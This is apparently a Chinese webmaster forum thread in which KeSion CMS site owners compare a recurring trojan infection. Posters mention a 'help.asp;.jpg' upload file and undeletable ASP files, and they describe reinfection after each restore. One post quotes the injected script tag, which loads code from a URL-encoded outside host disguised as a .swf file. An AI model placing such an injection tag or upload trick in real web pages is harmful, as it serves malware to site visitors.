发现一个这样的文件help.asp;.jpg，形成时间和被感染木马病毒的文件是相同的。网站主要是一级目录和二级目录下的列表及.js为后缀的文件容易感染病毒。三级以上目录下的文件一般没事，反而一级或三级目录下一律会出现index为前缀的文件被感染病毒。

UploadFiles已设置了无执行权限仍然没法防止中病毒。

后台检测木马的程序基本为空设，前台仍然有木马，后台用程序自带的检查木马的设置查找木马竟然会显示“扫描完毕！恭喜您,您的系统很安全,没有发现木马,希望您能保持！”。

重新上传了文件，删除了所有的网站文件包括数据库，刷新FTP后，并关闭了FTP，重设了FTP的密码，再登陆上传网站的备份文件，传完后，没出二十分钟，同样感染病毒！

不知道还有没有其它在线在处理这个事情的，希望能汇总一下问题，如果自己不能解决，看是否可以给官方提供些参考，好更快解决问题。

另有一问题，木马广告指向的网站竟然也是用科汛做的，应该是商业版做的站。

这个我和楼上的有些近似，虽然我的站推出时间不长，PR值有3，但是访问量不怎么高而且也没和别的站交换链接，因为是彻底的公益网站。商城是准备展示用的，不过目前还没加过一个内容进去。另一个站还在试运行阶段，推出不到一个月吧，所以其实我也有类似楼上站长的疑惑。

废话不多说了，希望能把问题综合到一起，供官方尽快找到解决方案。我不是职业站长，这样熬夜的日子在某种意义上是不务正业，只是希望是有意义的吧。

支持这个帖子。我的网站也是被挂“help.asp;.jpg” 强烈顶你。目前介于很多人说和楼主的体验。我暂时关闭了网站。等待官方有没有更进一步说明。

还有疑问。究竟黑客怎么知道我们这些用 科讯程序的网站呢？ 我首先声明，我没在论坛上发过自己任何的网址，是刚刚建立的网站。给企业建站的，所以根本不需要我推广，而且访问量很少，搜索很难搜，怎么就知道我的网址了呢？大家分析一下啊。

目前我基本清空了空间，但有还几个文件无法删除。文件的路径如下：

Images/Default/bottum.asp

KS_Editor/fckeditor/editor/dialog/fck_spellerpages/C00N.asp

KS_Editor/fckeditor/editor/js/inedx.asp

其中我两个站都中了木马，最后无法删除掉的文件及路径都如上三个。并说明一下，我这两个中病毒的站一个是5.5升级成V6的,另一个是V6的第二个测试版升级过来的，同是Eshop版本。另外还用不带商城的4.5做的站目前没丝毫问题。网站都放于同一台服务器。另还有其它文章管理程序做的站也在同一站，到发帖为止还没发现出过任何问题。

前面提到的三个文件都无法删除，看来只有到机房去删下看能不能彻底删除这几个文件。或是期待官方出更好的办法解决这问题。

你装的是哪个版本？说明一下，看看问题是不是出在同一个版本上。

我现在是没办法也睡不着  我安装科讯目录下是动网论坛 想到v6sp1已经完善了才把论坛整合过来 刚整合有四五天就出这个事了 连论坛都中招了 上万个文件被感染 怎么处理？开始认为就js文件的 再一看连html模板都感染了 我的论坛是我自己修改的 做到哪改到哪 复杂的有备份 简单的没备份 现在都不知道哪和哪了 覆盖也没用 打不开了

<script src="http://%77%77%77.icxx%77.com/images/logo.s%77f" type="text/javascript" language="JavaScript" id="seraph5script2442"  ></script>

<script src="/ks_inc/ajax.js" type="text/javascript"></script>

看看就知道了，复制红色的字后就能访问到该站了。不过我最奇怪的就是，我FTP上存了还有两个站也是用科汛做的，保存了密码的，选IP地址就可以登陆，但这两个站没问题，其中有个站的IP地址段和另一个中木马的是同一个。也就是说我的FTP没问题，服务器下的各个站都是独立安全的。到现在已六个小时了，我将中木马的站删了又重新上传备份文件，又中病毒，再查找和修复中毒文件。没办法，科汛的程序里JS文件太多，很多的头文件也中病毒，包括生成静态页面的也中病毒。真让人抓狂。